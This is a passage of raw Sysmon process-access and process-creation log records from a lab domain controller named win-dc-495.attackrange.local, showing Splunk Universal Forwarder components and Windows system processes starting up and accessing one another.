Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:48.742{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9580-6005-6205-00000000A301}6988C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:04:48.742{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:48.742{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:04:48.742{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:48.742{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:48.742{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9580-6005-6205-00000000A301}6988C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:48.742{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9580-6005-6205-00000000A301}6988C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:48.742{59A5CD1D-9580-6005-6205-00000000A301}6988C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:48.226{59A5CD1D-9580-6005-6105-00000000A301}42326516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:48.070{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9580-6005-6105-00000000A301}4232C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:04:48.070{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:48.070{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:04:48.070{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:48.070{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:48.070{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9580-6005-6105-00000000A301}4232C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:48.070{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9580-6005-6105-00000000A301}4232C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:48.070{59A5CD1D-9580-6005-6105-00000000A301}4232C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:49.570{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9581-6005-6305-00000000A301}3796C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:49.570{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:04:49.570{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:49.570{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:04:49.570{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:49.570{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9581-6005-6305-00000000A301}3796C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:49.570{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9581-6005-6305-00000000A301}3796C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:49.570{59A5CD1D-9581-6005-6305-00000000A301}3796C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 